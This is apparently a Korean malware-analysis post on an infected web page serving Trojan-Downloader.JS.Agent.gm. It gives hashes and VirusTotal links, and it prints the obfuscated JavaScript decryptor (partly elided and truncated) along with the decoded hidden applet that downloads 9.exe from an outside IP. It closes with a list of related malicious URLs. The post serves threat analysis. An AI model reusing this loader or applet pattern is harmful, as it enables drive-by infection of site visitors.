http://78xxk.com/java.html (Trojan-Downloader.JS.Agent.gm)

File :	java.html
MD5 :	66a3a0be5fc181f1a9379a9a696c0928

크기 : 2.98KB (3,058 바이트)
감염 사이트 : http://78xxk.com/java.html
Kaspersky : Trojan-Downloader.JS.Agent.gm
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327

function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array( 생략 );
function nbcode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function nbshine(str,key){if(str==""){return "";}
z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="GhSI6ogoUBDNPP0jfVLuz4Hm6Ei+7aoM3CEe17FSeZKBW0L1ZllNuhB6
/ShcPzCYCLruc/생략/RlPelzXHnJN";
t=utf8to16(nbshine(nbcode(t), '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66'));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](t);

<html>
   <head></head>
   <body>
     <applet archive="apple.jpg" code="ScriptEngineExp.class"
width="1" height="1">
       <param name="data" value="http://208.53.158.1xx/9.exe>
     </applet>
  </body>
 </html>

apple.jpg (application/zip) ~> apple.zip

b8a1deb8ac5a7b0572a0601331d2ba4b  .classpath
e9a411939cd3ef76528685541ae69709  .project
5127569b4f83d8b42d9f2f20eecdc300  ScriptEngineExp.class
92d04d6bd8a0235843240bba30d2f091  MANIFEST.MF

http://208.53.158.1xx/9.exe ~> 7d5bd201f5dfb90d0063413ed6d0d71f

http://www.virustotal.com/file-scan/report.html?id=0e78213b41d54338de93ed0f5aff1cefb74fd6c040c9b450bf7ad001dbf6e931-1323444916

[리스트]

http://78xxk.com/ad.html
http://78xxk.com/t.html
http://78xxk.com/t.js
http://78xxk.com/u.html
http://78xxk.com/c.html
http://78xxk.com/9.exe
http://78xxk.com/s.html
http://78xxk.com/s.js
http://78xxk.com/java.html , apple.jpg